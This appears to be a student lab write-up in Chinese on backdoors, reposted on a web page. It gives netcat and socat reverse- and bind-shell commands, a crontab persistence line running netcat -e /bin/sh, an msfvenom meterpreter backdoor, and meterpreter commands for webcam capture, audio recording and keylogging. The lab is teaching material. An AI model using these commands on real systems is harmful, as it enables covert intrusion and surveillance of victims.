首页 > 其他 > 详细

后门原理与实践

时间:2018-04-03 21:45:00      阅读:279      评论:0      收藏:0      [点我收藏+]

一、实验操作步骤

1.Windows获得Linux Shell

ipconfig查询Windows主机IP地址

技术分享图片

Windows中输入win+rcmdcdncat目录文件→ncat.exe -l -p 4310(监听端口)

在Linux输入 nc 192.168.1.185 4311 -e /bin/sh连接上端口

 

Windows获得Linux shell,可运行任意指令。

 

2.Linux获得Windows Shell

IP

 

技术分享图片

 

 

Linux设置监听端口

Windows反弹连接

 

进制显示差异导致出现乱码。

技术分享图片

 

3.使用nc传输数据

W监听端口4310L反弹连接,进行字符传输

 

技术分享图片

 

技术分享图片

 

W监听窗口4310

L输出crontab -e 命令建立一项定时任务

选择vim basic

技术分享图片

 

 

在最后添加代码

10 * * * *  /bin/netcat 192.168.1.185 4311 -e /bin/sh 保存退出

技术分享图片

 

技术分享图片

5..使用socat获取主机操作Shell, 任务计划启动

控制面板->系统和安全->管理工具->任务计划,新建一个任务。

技术分享图片

 

新建触发器设定开始任务为工作站锁定时

技术分享图片

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4311 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4311,同时把cmd.exestderr重定向到stdout上:

技术分享图片

 

创建后运行。

 L输入指令 socat - tcp:192.168.1.185:4311发现成功获得W Shell。

技术分享图片

 

6.使用MSF meterpreter生成可执行文件,利用ncatsocat传送到主机并运行获取主机Shell

 

L输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.199 LPORT=4311 -f exe > 20154311_backdoor.exe 生成后门程序

 

技术分享图片

Linux上使用 msfconsle 指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

技术分享图片

设置完成后,执行监听指令 exploit

打开windows上的后门程序20154310_backdoor.exe

 

执行 record_mic 指令录制一段音频。

使用 webcam_snap 指令可以使用摄像头进行拍照。

 

执行 screenshot 指令可以进行截屏。

 

执行 keyscan_strat 指令开始记录下击键的过程,执行 keyscan_dump 指令读取击键的记录。

技术分享图片

技术分享图片

技术分享图片

二、心得体会

四、心得体会

这次实验的难度整体来说比上一次可以说是稍难一些,在理解和实际操作的时候也更困难一点。不过当大部分理解并完成操作以后还是很有成就感的。虽然是模拟攻击,但还是让人有些后怕,自己的计算机只要连上了某个节点就会轻易得被留下后门,攻击者就能随意监视我甚至动用我的摄像头拍摄我的生活起居,想想还真是可怕。所以我们在日常操作中应该更加谨慎,绝不浏览危险网址,防止个人信息泄露。这是我学习这门课程以来的最大心得。

后门原理与实践

原文:https://www.cnblogs.com/895359188qq/p/8711102.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!